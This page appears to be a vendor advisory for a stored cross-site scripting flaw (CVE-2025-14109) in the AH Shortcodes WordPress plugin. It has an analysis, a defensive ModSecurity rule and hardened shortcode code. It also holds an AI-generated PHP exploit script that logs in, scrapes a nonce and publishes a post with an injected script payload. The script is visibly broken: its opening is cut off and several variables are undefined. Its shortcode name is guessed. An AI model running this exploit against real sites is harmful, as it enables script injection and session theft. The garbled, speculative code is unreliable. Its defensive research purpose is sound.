Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-14109: AH Shortcodes <= 1.0.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'column' Shortcode Attribute (ah-shortcodes)

Plugin ah-shortcodes
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 1.0.2
Patched Version
Disclosed January 5, 2026

Analysis Overview

analysis:

Atomic Edge analysis of CVE-2025-14109 (metadata-based):

This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the AH Shortcodes WordPress plugin. The vulnerability exists in the plugin's 'column' shortcode attribute. Attackers with Contributor-level permissions or higher can inject malicious scripts into pages or posts. These scripts execute when a user views the compromised content. The CVSS score of 6.4 (Medium) reflects the requirement for authentication and the scope change impact on site users.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping for the 'column' shortcode attribute. The CWE-79 classification confirms improper neutralization of input during web page generation. The plugin likely registers a shortcode handler that directly echoes or unsafely prints user-supplied attribute values without applying proper escaping functions like `esc_attr()` or `wp_kses()`. This conclusion is inferred from the CWE and the standard WordPress shortcode implementation pattern, as no source code diff is available for confirmation.

An attacker exploits this by creating or editing a post with the vulnerable shortcode. The payload is placed within the 'column' attribute. A typical malicious shortcode block would be `[ah_column column="alert(document.domain)"]Content[/ah_column]`. The attacker saves the post. The malicious script then executes in the browsers of all visitors who view that post. Contributor-level users can create unpublished posts, which is sufficient for this attack.

Remediation requires implementing proper output escaping. The plugin must escape the 'column' attribute value before outputting it into the page's HTML context. Standard WordPress functions for this include `esc_attr()` for attribute contexts or `wp_kses()` for more controlled HTML stripping. Input sanitization using `sanitize_text_field()` on the attribute value during shortcode processing would provide a secondary layer of defense. The patch should also validate the attribute's expected data type.

Successful exploitation leads to limited confidentiality and integrity loss within the victim's browser context. Attackers can steal session cookies, perform actions as the victim user, deface the site content, or redirect users to malicious sites. The impact is confined to the browser session of users viewing the infected page. It does not directly lead to server compromise or database access.

poc_php:

// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14109 - AH Shortcodes <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'column' Shortcode Attribute
alert(document.domain)';
$shortcode_content = "Injected post content.";
$post_title = "Test Post with XSS";

// Initialize cURL session for cookie handling
$ch = curl_init();
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate to WordPress
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
$response = curl_exec($ch);

// Step 2: Extract the nonce for creating a post.
// Assumption: The plugin does not add extra nonce checks for shortcode attributes in the post editor.
// The standard WordPress post creation nonce is required.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

preg_match('/"_wpnonce" value="([a-f0-9]+)"/', $response, $nonce_matches);
$creation_nonce = $nonce_matches[1] ?? '';

if (empty($creation_nonce)) {
    die("Failed to extract nonce for post creation.");
}

// Step 3: Create a new post containing the malicious shortcode.
// The exact shortcode tag name is inferred from the plugin name 'AH Shortcodes' and the vulnerable 'column' attribute.
// We assume the shortcode is registered as something like 'ah_column'.
$post_content = "[ah_column column=\"" . $malicious_attribute . "\"]" . $shortcode_content . "[/ah_column]";

$post_fields = [
    'post_title' => $post_title,
    'content' => $post_content,
    'publish' => 'Publish',
    '_wpnonce' => $creation_nonce,
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'post_type' => 'post',
    'post_status' => 'publish'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$response = curl_exec($ch);

// Check for success (a redirect to the post or edit screen)
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200 || curl_getinfo($ch, CURLINFO_HTTP_CODE) === 302) {
    echo "Proof of Concept executed. Check the published post for XSS execution.\n";
    echo "The post contains the shortcode: " . htmlspecialchars($post_content) . "\n";
} else {
    echo "Post creation may have failed. HTTP Code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "\n";
}

curl_close($ch);

?>

modsecurity_rule:

# Atomic Edge WAF Rule - CVE-2025-14109 (metadata-based)
# Note: this chain only inspects admin-ajax.php requests whose 'action' starts with
# 'ah_shortcodes_'. A post saved through /wp-admin/post.php (the path the PoC above
# uses) is not covered by it; the third rule's pattern would need to be applied to
# that request as well, and the rule should be verified against the real plugin.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:1410901,phase:2,deny,status:403,chain,msg:'CVE-2025-14109 via AH Shortcodes AJAX',severity:'CRITICAL',tag:'CVE-2025-14109',tag:'WordPress',tag:'Plugin',tag:'XSS'"
    SecRule ARGS_POST:action "@rx ^ah_shortcodes_" "chain"
    # Matches a 'column' attribute whose quoted value goes on to open a tag ('<');
    # the final character class was empty on the page and is reconstructed as [<].
    SecRule ARGS_POST|ARGS_GET "@rx column\s*[=]\s*[^\s>]*[\"'][^>]*[<]"
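As an added illustration (not code from the AH Shortcodes plugin or from Atomic Edge), the following shows a hypothetical 'ah_column' handler written in the unsafe pattern the analysis infers, beside a hardened version that applies the three remediation steps named above: sanitize the attribute, validate it against the values the layout is expected to support, and escape it with esc_attr() at output. The tag name, the default and the list of allowed values are assumptions.

```php
<?php
// Added illustration, not the AH Shortcodes plugin's code. The shortcode tag
// 'ah_column', the default value and the allowed values below are assumptions.

// Unsafe pattern the advisory describes: the raw 'column' attribute is
// concatenated into an HTML attribute. A value that closes the quote and
// opens a new tag is stored with the post and rendered for every viewer.
function ahx_column_unsafe( $atts, $content = null ) {
    $atts = shortcode_atts( array( 'column' => 'one-half' ), $atts, 'ah_column' );
    return '<div class="ah-column ' . $atts['column'] . '">'
        . do_shortcode( $content ) . '</div>';
}

// Layout classes the shortcode is assumed to support; anything else is rejected.
function ahx_column_allowed_values() {
    return array( 'one-half', 'one-third', 'two-thirds', 'one-fourth', 'full' );
}

// Hardened pattern: sanitize, validate the expected type, then escape at output.
function ahx_column_safe( $atts, $content = null ) {
    $atts = shortcode_atts( array( 'column' => 'one-half' ), $atts, 'ah_column' );

    // 1) Sanitize: reduce the attribute to a plain, trimmed string (no tags, no NUL bytes).
    $column = sanitize_text_field( (string) $atts['column'] );

    // 2) Validate: the attribute selects a layout, so only the known names are acceptable.
    //    Fail closed to the default rather than passing an unexpected value through.
    if ( ! in_array( $column, ahx_column_allowed_values(), true ) ) {
        $column = 'one-half';
    }

    // 3) Escape for the HTML attribute context. Keep this even though step 2 already
    //    restricts the value: output escaping must not depend on upstream checks.
    return '<div class="ah-column ' . esc_attr( $column ) . '">'
        . do_shortcode( $content ) . '</div>';
}

// Only the hardened handler is registered; the unsafe one is kept for comparison.
add_shortcode( 'ah_column', 'ahx_column_safe' );
```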

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
